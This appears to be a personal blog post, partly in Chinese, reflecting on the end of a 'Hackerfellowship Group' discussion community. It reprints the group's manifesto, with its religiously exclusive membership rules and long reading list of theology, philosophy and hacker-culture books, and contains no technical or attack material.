Hidden Order: How Adaptation Builds Complexity - John Holland
The Quark and the Jaguar: Adventures in the Simple and the Complex - Murray Gell-Mann
------------------------------------------------------------------------------------------
中文版
什么是Fellowship?
在古希腊,Fellowship的意思是一群有着相同目的的聚在一起努力完成一些事情。HFG就是这么一个地方。黑客们永远是活在未来,也是未来的缔造者!
我们的目标?
Hacking, 找到各个领域的真相!因为黑客的内心渴望真相。地下的场景是黑客必备的经历。我们尝试建立一个地下的在线和线下的社区去帮助我们自己更好的挖掘在表面之下 的真相。Hacking整个四层模型(神学/哲学/数学/工程)的过程不可避免的会遭遇世界的复杂性。
加入HFG的要求:
请认真思考加入HFG的动机,HFG就如兄弟会(注:兄弟会不等于酱缸)一般,你必须分享你的思想,因为这样可以碰撞出更多的"aha",除了抱着分享的态度之外,您还得满足以下条件:
1, 抱着开放式的态度来进行探讨,我们关注你的哲学,而不是道听途说的知识。
2, 如果您来自计算机领域,在技术上至少具有编程经验:C语言基础(图灵机路线) or scheme编程基础(lambda演算路线),并具备构建计算机科学的世界观的能力。
3, 如果你是无神论,我们只接受真正的无神论,因为他们为了探寻真理可以不惜一切代价,如果你属于大众意义上的无神论,请马上滚蛋!
4, 如果你是基督徒,只有归正信仰(路德宗,加尔文主义,etc)是被HFG所接受的,因为他们愿意投身于各个领域的文化使命。
为什么加入HFG?
或许有很多理由,但这里我们只罗列最为重要的一些:
1, 我们是一群努力探寻人生意义和遵循黑客伦理的人。即使我们目前没有搞明白我们存在的意义或者在这个时代性背景下我们的位置,这没关系,我们会搞明白的。
2, 兄弟会就如第二基地一样从来都没存在过,wait...那第一基地在哪里? 你明白这个隐喻吗? 加入HFG,至少意味着你可以学习和参与到建立一个地下的兄弟会。
3, 并不是所有人都来自计算机领域。有很多人在非计算机领域也做的非常棒,我们简单称呼他们为Generic Hacker。黑客伦理的影响原超过了我们的想象。我们是黑客!我们是匿名者!我们有不同的hacking经历和背景。但,我们却共享着同样的方法论。
HFG推荐学习的MIT OCW课程:
1,Structure and Interpretation of Computer Programs
2,Introduction to Computer Science and Programming(python)
3,Operating System Engineering
4,Computer Language Engineering
5,Practical Programming in C
6,Multicore Programming Primer
计算机领域的技术话题:
1, Lisp解释器
2, GNU/Linux
3, 开放硬件
参考读物:
------------------------------------------------------------------------------------------
The Holy Bible(圣经) - SOMEONE
------------------------------------------------------------------------------------------
Hacker, Hacker, Hacker!!!
------------------------------------------------------------------------------------------
Hacker Ethics and the Spirit of the Information Age(黑客伦理与信息时代精神) by Pekka Hiemann
Hackers: Heroes of the Computer Revolution by Steven Levy
Masters of Doom: How Two Guys Created an Empire and Transformed Pop Culture - David Kushner
Hackers and Painters: Big Ideas from the Computer Age(黑客与画家:科技时代的思想碰撞) by Paul Graham
The Art of Intrusion - Kevin Mitnick
------------------------------------------------------------------------------------------
Ideas - Theological philosphy & Philosophical theology
------------------------------------------------------------------------------------------
The Institution of Christian Religion(基督教要义) - John Cavlin
Redeeming Science - Vern Sheridan Poythress
The Silmarillion(精灵宝钻) - John Ronald Reuel Tolkien,
The Trilogy of The Lord of the Rings(魔戒三部曲) - John Ronald Reuel Tolkien
The Protestant Ethic and the Spirit of Capitalism(新教伦理与资本主义精神) - Max Webber
The Consequences of Ideas: Understanding the Concepts that Shaped Our World(思想的结果) - R. C. Sproul
Making Sense of It All Pascal and the Meaning of Life - Thomas V. Morris
Worldview: The History of a Concept - David K. Naugle
Augustine's Confessions(忏悔录) - St.Augestine
The Great Philosophers(大哲学家) - Karl Theodor Jaspers
Truth or Consequences: The Promise & Perils of Postmodernism - Millard J. Erickson
Twilight of the Idols - Friedrich Nietzsche
The Will to Power(权力意志) - Friedrich Nietzsche
Philosophical Fragments - Soren Aabye Kierkegaard
Interview with the Vampire - Anne Rice
The Vampire Lestat - Anne Rice
My Life: A Spoken Autobiography - Fidel Castro
Man, his nature and place in the world - Arnold Gehlen
Wild at heart - John Eldredge
Mathematics in Western Culture - Morris Kline
Metaphysics - Aristotle
Nine Talmudic Readings - Emmanuel Levinas
Mere Christianity(返朴归真) - C. S. Lewis
On the Trinity(论三位一体) - St.Augestine
Thoughts - Blaise Pascal
A History of Western Philosophy(西方哲学史) - Bertrand Russell
On Judaism(论犹太教) - Martin Buber
Shadows of the Mind: A Search for the Missing Science of Consciousness - Roger Penrose
God in Search of Man : A Philosophy of Judaism - AJB
Essence of Judaism - Leo Baeck
Everyman's Talmud - Abraham Cohen
The Matrix and Philosophy: Welcome to the Desert of the Real - William Irwin
Start-up Nation: The Story of Israel's Economic Miracle(创业的国度) - Saul Singer
Out of Control: The New Biology of Machines, Social Systems, and the Economic World(失控) - KK
What Technology Wants - KK
When Science Meets Religion: Enemies, Strangers, or Partners? - Ian G. Barbour
Foundation Series by Isaac Asimov
English Deism: Its Roots And Its Fruits - John Orr
The Singularity is near - Ray Kurzweil
Complexity: The Emerging Science at the Edge of Order and Chaos - M. Mitchell Waldrop
Hidden Order: How Adaptation Builds Complexity - John Holland
The Quark and the Jaguar: Adventures in the Simple and the Complex - Murray Gell-Mann
------------------------------------------------------------------------------------------
I became a christian in 2004. Then the following years I was reading/learning a lot of stuff about other people's consequence of ideas. In late 2007, after 3 years of thinking, I thought I was still lacking of "aha" ideas. There were more conversations in face-2-face back then. I sponsored a community to get a group of people together to discussion on some topics. HFG( Hackerfellowship Group) was born in 2007. We have had monthly meeting for 5 years. We also had a lot of discussions on mailinglist. People came and went. A lot of things happened. I tried to build HFG as an organic community but I totally failed. I neglected the most important factor in the organic community: People must already have organic life, hacker's life. I expected HFG could have the spirit of underground community but it never did. Because these guys I was hacking with who were not hackers even didn't understand what hacker ethic is. Nalaginrut/fU9ANg/口水猫/....you are not fucking hackers! How could people get used to talking about hacker ethic without any experience of underground scenes? Indeed, I was inspired by Phrack. That's why I ended HFG in my life journey. I'm becoming more like a security guy but not as a generic hacker. I shut down the mailing list and set it open for public. Someday in the future, will I be back? I don't know. Anything is possible if I really want to.
Don't give me wrong. Some of former HFG members are still my good friends. Unfortunately, only friends without brotherhood tag. I built my own fundamentally structure of philosophy with the experiences in HFG. Unfortunately again, it was only my philosophy, it always be. I finally decided to release the latest version of HFG manifesto on my blog last month. I hope it could help people who are struggling with sort of philosophic ideas. But I'm not sure if it really could be helpful. I just do what I should do. I know people would like to hear a happy ending. I'm so sorry, did I fuck your mind again? You fuc*ing tell me...
btw: Internet is a incredible system. No one gives a shit about who you are or what you believed in internet. What internet care is only about ideas. V is right about the ideas are immortality. No one can destroy the ideas.
-----------------------------------------------------------------------------------------------------
HFG( Hackerfellowship Group) manifesto alpha-end revised version
what is Fellowship?
In ancient Greece, the fellowship means a group of guys who are hacking together for achieving the same goal. The HackerFellowship will get hackers together for conversation/sharing/hacking. Hackers are always living in the future, and making the definition of the future!
What is our goal?
Hacking, find the truth! Because Hackers want/need truth. Hackers must experience sort of underground scenes. We are trying to build an underground online/offline community to help us digging deeper, which behind the surface. Hacking on 4-layer model of Theo/Philo/Math/Engi with inevitable complexity of this world...
I want to join in, but how?
Wait a min, my dear friend. We wish you could be one of us just like a brother(maybe you are a sister) return home. We all know that choose the strong philosophy is our only option. In the whole eco-system( Sunday school->brotherhood->community->start-up->company->Multi-regional corporation), building a brotherhood is our target. Once you get in, you must share some views/knowledge. Keep that in mind: what we are really concerning it's about your own philosophy, and we need you prove that you have these abilities or background below to contribute:
1, Join in a conversations like a philosopher who lived in ancient Greece.
2, If you are come from computer field, you should have basis computer programming skills either in C(think about the way of Turing Machine) or scheme(think about the way of Lambda calculus). And having the ability to make your own personal world view on computing field.
3, If you are atheist, we only accept those real atheist( like Ray Kurzweil?) who are looking for the truth whatever it costs. If you are not type of them, fuck outta of here.
4, If you are a christian, only the reformed faith(Lutheranism,Calvinist,neo-Calvinist,etc) are welcome in HFG! Because we need a christian who is willing to dedicate to cultural mandate( defined by reformed theology) in his/her hacking field.
Why HFG?
There may be dozen of reasons. We only list some highlighted ones:
1, We are type of people who are following the hacker ethic and focus on the purpose of life. Even we don't know the purpose or our position in this specific era. We are still trying to figure it out.
2, The brotherhood is like the 2nd foundation never existed. Wait...Where the hell is the 1st foundation? Do you get it? Join HFG, which means you have a chance to learn/hack on how to build an underground brotherhood.
3, Not all of us are comes from computer fields. A lot of people did really good job at non-computer field that we called them Generic hacker. Hacker ethic now affecting more places than our thought. We are hackers! We are anonymous! We have different hacking background. But we are sharing the same methodologies.
We suggest you could learn these courses on MIT OCW:
1, Structure and Interpretation of Computer Programs
2, Introduction to Computer Science and Programming( python)
3, Operating System Engineering
4, Computer Language Engineering
5, Practical Programming in C
6, Multicore Programming Primer
Techique topic:
1, Lisp interpreter
2, GNU/Linux
3, Open hardware
Some materials are our friendly arsenal:
------------------------------------------------------------------------------------------
The Holy Bible - SOMEONE
------------------------------------------------------------------------------------------
Hacker, Hacker, Hacker!!!
------------------------------------------------------------------------------------------
Hacker Ethics and the Spirit of the Information Age by Pekka Hiemann
Hackers: Heroes of the Computer Revolution by Steven Levy
Masters of Doom: How Two Guys Created an Empire and Transformed Pop Culture - David Kushner
Hackers and Painters: Big Ideas from the Computer Age by Paul Graham
The Art of Intrusion - Kevin Mitnick
------------------------------------------------------------------------------------------
Ideas - Theological philosphy & Philosophical theology
------------------------------------------------------------------------------------------
The Institution of Christian Religion - John Cavlin
Redeeming Science - Vern Sheridan Poythress
The Silmarillion -
The trilogy of The Lord of the Rings -
The Protestant Ethic and the Spirit of Capitalism - Max Webber
The Consequences of Ideas: Understanding the Concepts that Shaped Our World - R. C. Sproul
Making Sense of It All Pascal and the Meaning of Life - Thomas V. Morris
Worldview: The History of a Concept - David K. Naugle
Augustine's Confessions - St.Augestine
The Great Philosophers - Karl Theodor Jaspers
Truth or Consequences: The Promise & Perils of Postmodernism - Millard J. Erickson
Twilight of the Idols - Friedrich Nietzsche
The Will to Power - Friedrich Nietzsche
Philosophical Fragments - Soren Aabye Kierkegaard
Interview with the Vampire - Anne Rice
The Vampire Lestat - Anne Rice
My Life: A Spoken Autobiography - Fidel Castro
Man, his nature and place in the world - Arnold Gehlen
Wild at heart - John Eldredge
Mathematics in Western Culture - Morris Kline
Metaphysics - Aristotle
Nine Talmudic Readings - Emmanuel Levinas
Mere Christianity - C. S. Lewis
On the Trinity - St.Augestine
Thoughts - Blaise Pascal
A History of Western Philosophy - Bertrand Russell
On Judaism - Martin Buber
Shadows of the Mind: A Search for the Missing Science of Consciousness - Roger Penrose
God in Search of Man : A Philosophy of Judaism - AJB
Essence of Judaism - Leo Baeck
Everyman's Talmud - Abraham Cohen
The Matrix and Philosophy: Welcome to the Desert of the Real - William Irwin
Start-up Nation: The Story of Israel's Economic Miracle - Saul Singer
Out of Control: The New Biology of Machines, Social Systems, and the Economic World - KK
What Technology Wants - KK
When Science Meets Religion: Enemies, Strangers, or Partners? - Ian G. Barbour
Foundation Series by Isaac Asimov
English Deism: Its Roots And Its Fruits - John Orr
The Singularity is near - Ray Kurzweil
Complexity: The Emerging Science at the Edge of Order and Chaos - M. Mitchell Waldrop
Hidden Order: How Adaptation Builds Complexity - John Holland
The Quark and the Jaguar: Adventures in the Simple and the Complex - Murray Gell-Mann
------------------------------------------------------------------------------------------
中文版
什么是Fellowship?
在古希腊,Fellowship的意思是一群有着相同目的的聚在一起努力完成一些事情。HFG就是这么一个地方。黑客们永远是活在未来,也是未来的缔造者!
我们的目标?
Hacking, 找到各个领域的真相!因为黑客的内心渴望真相。地下的场景是黑客必备的经历。我们尝试建立一个地下的在线和线下的社区去帮助我们自己更好的挖掘在表面之下 的真相。Hacking整个四层模型(神学/哲学/数学/工程)的过程不可避免的会遭遇世界的复杂性。
加入HFG的要求:
请认真思考加入HFG的动机,HFG就如兄弟会(注:兄弟会不等于酱缸)一般,你必须分享你的思想,因为这样可以碰撞出更多的"aha",除了抱着分享的态度之外,您还得满足以下条件:
1, 抱着开放式的态度来进行探讨,我们关注你的哲学,而不是道听途说的知识。
2, 如果您来自计算机领域,在技术上至少具有编程经验:C语言基础(图灵机路线) or scheme编程基础(lambda演算路线),并具备构建计算机科学的世界观的能力。
3, 如果你是无神论,我们只接受真正的无神论,因为他们为了探寻真理可以不惜一切代价,如果你属于大众意义上的无神论,请马上滚蛋!
4, 如果你是基督徒,只有归正信仰(路德宗,加尔文主义,etc)是被HFG所接受的,因为他们愿意投身于各个领域的文化使命。
为什么加入HFG?
或许有很多理由,但这里我们只罗列最为重要的一些:
1, 我们是一群努力探寻人生意义和遵循黑客伦理的人。即使我们目前没有搞明白我们存在的意义或者在这个时代性背景下我们的位置,这没关系,我们会搞明白的。
2, 兄弟会就如第二基地一样从来都没存在过,wait...那第一基地在哪里? 你明白这个隐喻吗? 加入HFG,至少意味着你可以学习和参与到建立一个地下的兄弟会。
3, 并不是所有人都来自计算机领域。有很多人在非计算机领域也做的非常棒,我们简单称呼他们为Generic Hacker。黑客伦理的影响原超过了我们的想象。我们是黑客!我们是匿名者!我们有不同的hacking经历和背景。但,我们却共享着同样的方法论。
HFG推荐学习的MIT OCW课程:
1,Structure and Interpretation of Computer Programs
2,Introduction to Computer Science and Programming(python)
3,Operating System Engineering
4,Computer Language Engineering
5,Practical Programming in C
6,Multicore Programming Primer
计算机领域的技术话题:
1, Lisp解释器
2, GNU/Linux
3, 开放硬件
参考读物:
------------------------------------------------------------------------------------------
The Holy Bible(圣经) - SOMEONE
------------------------------------------------------------------------------------------
Hacker, Hacker, Hacker!!!
------------------------------------------------------------------------------------------
Hacker Ethics and the Spirit of the Information Age(黑客伦理与信息时代精神) by Pekka Hiemann
Hackers: Heroes of the Computer Revolution by Steven Levy
Masters of Doom: How Two Guys Created an Empire and Transformed Pop Culture - David Kushner
Hackers and Painters: Big Ideas from the Computer Age(黑客与画家:科技时代的思想碰撞) by Paul Graham
The Art of Intrusion - Kevin Mitnick
------------------------------------------------------------------------------------------
Ideas - Theological philosphy & Philosophical theology
------------------------------------------------------------------------------------------
The Institution of Christian Religion(基督教要义) - John Cavlin
Redeeming Science - Vern Sheridan Poythress
The Silmarillion(精灵宝钻) - John Ronald Reuel Tolkien,
The Trilogy of The Lord of the Rings(魔戒三部曲) - John Ronald Reuel Tolkien
The Protestant Ethic and the Spirit of Capitalism(新教伦理与资本主义精神) - Max Webber
The Consequences of Ideas: Understanding the Concepts that Shaped Our World(思想的结果) - R. C. Sproul
Making Sense of It All Pascal and the Meaning of Life - Thomas V. Morris
Worldview: The History of a Concept - David K. Naugle
Augustine's Confessions(忏悔录) - St.Augestine
The Great Philosophers(大哲学家) - Karl Theodor Jaspers
Truth or Consequences: The Promise & Perils of Postmodernism - Millard J. Erickson
Twilight of the Idols - Friedrich Nietzsche
The Will to Power(权力意志) - Friedrich Nietzsche
Philosophical Fragments - Soren Aabye Kierkegaard
Interview with the Vampire - Anne Rice
The Vampire Lestat - Anne Rice
My Life: A Spoken Autobiography - Fidel Castro
Man, his nature and place in the world - Arnold Gehlen
Wild at heart - John Eldredge
Mathematics in Western Culture - Morris Kline
Metaphysics - Aristotle
Nine Talmudic Readings - Emmanuel Levinas
Mere Christianity(返朴归真) - C. S. Lewis
On the Trinity(论三位一体) - St.Augestine
Thoughts - Blaise Pascal
A History of Western Philosophy(西方哲学史) - Bertrand Russell
On Judaism(论犹太教) - Martin Buber
Shadows of the Mind: A Search for the Missing Science of Consciousness - Roger Penrose
God in Search of Man : A Philosophy of Judaism - AJB
Essence of Judaism - Leo Baeck
Everyman's Talmud - Abraham Cohen
The Matrix and Philosophy: Welcome to the Desert of the Real - William Irwin
Start-up Nation: The Story of Israel's Economic Miracle(创业的国度) - Saul Singer
Out of Control: The New Biology of Machines, Social Systems, and the Economic World(失控) - KK
What Technology Wants - KK
When Science Meets Religion: Enemies, Strangers, or Partners? - Ian G. Barbour
Foundation Series by Isaac Asimov
English Deism: Its Roots And Its Fruits - John Orr
The Singularity is near - Ray Kurzweil
Complexity: The Emerging Science at the Edge of Order and Chaos - M. Mitchell Waldrop
Hidden Order: How Adaptation Builds Complexity - John Holland
The Quark and the Jaguar: Adventures in the Simple and the Complex - Murray Gell-Mann
------------------------------------------------------------------------------------------
Subscribe to:
Posts (Atom)